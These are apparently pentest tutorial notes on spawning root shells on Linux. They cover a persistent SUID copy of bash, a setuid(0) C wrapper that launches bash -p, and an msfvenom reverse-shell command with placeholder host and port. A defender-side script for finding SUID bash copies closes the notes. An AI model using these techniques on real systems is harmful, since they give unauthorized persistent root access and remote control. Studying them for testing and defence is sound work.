# Spawning Root Shells

### "rootbash" SUID

- Create a copy of the /bin/bash executable file (name it rootbash for fun), make sure it is owned by the root user, and has the SUID bit set.
- A root shell can be spawned by simply executing the rootbash file with the -p command line option.
- The benefit of this method is that it is persistent (once the exploit is run, rootbash can be used multiple times).

### Custom Executable

There may be instances where some root process executes another process which you can control. In these cases, the following C code, once compiled, will spawn a bash shell running as root:

```c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */
int main(void) {
    setuid(0);              /* set real and effective uid to root; succeeds because the caller already runs as root */
    system("/bin/bash -p"); /* -p: bash keeps the privileged uid instead of resetting it to the real uid */
    return 0;
}
```

Compile using the following command:

```bash
$ gcc -o <name> <filename.c>
```

### msfvenom

If a reverse shell is preferred, msfvenom can be used to generate an executable (elf) file:

```bash
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
```

The reverse shell can be caught using netcat or Metasploit's own multi/handler.

### Native Reverse Shells

There are multiple ways to spawn reverse shells natively on many Linux distributions. A good tool for suggesting these is: https://github.com/mthbernardes/rsg

All can be caught using a netcat listener.
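A defender-side check for the "rootbash" persistence described above, as an added shell example that is not part of the original notes: it lists SUID files whose contents are byte-identical to a reference binary, so a renamed copy of /bin/bash is found regardless of its filename or location. Assumes Linux with GNU find and sha256sum; the function names find_suid_copies and count_suid_copies are my own.

```shell
#!/bin/sh
# Added example: hunt for SUID copies of a reference binary (e.g. /bin/bash).
# Matching on content hash rather than filename catches "rootbash", "x", etc.
# Assumes Linux with GNU findutils and coreutils (sha256sum).

# Usage: find_suid_copies REFERENCE_BINARY SEARCH_DIR
# Prints one matching path per line; prints nothing when there are none.
find_suid_copies() {
    ref="$1"
    dir="$2"
    ref_hash=$(sha256sum "$ref" | cut -d' ' -f1)
    # -type f: regular files only; -perm -4000: SUID bit set; -xdev: stay on one filesystem.
    find "$dir" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        h=$(sha256sum "$f" 2>/dev/null | cut -d' ' -f1)
        if [ "$h" = "$ref_hash" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Number of matches; "0" is the expected steady state, anything else is worth an alert.
count_suid_copies() {
    find_suid_copies "$1" "$2" | wc -l | tr -d ' '
}

# Typical run as root over the whole filesystem:
#   find_suid_copies /bin/bash /
```

A legitimate SUID bash is essentially never expected, so any hit is a candidate for incident response; extend the reference list to other shells (/bin/sh, /bin/dash) for broader coverage.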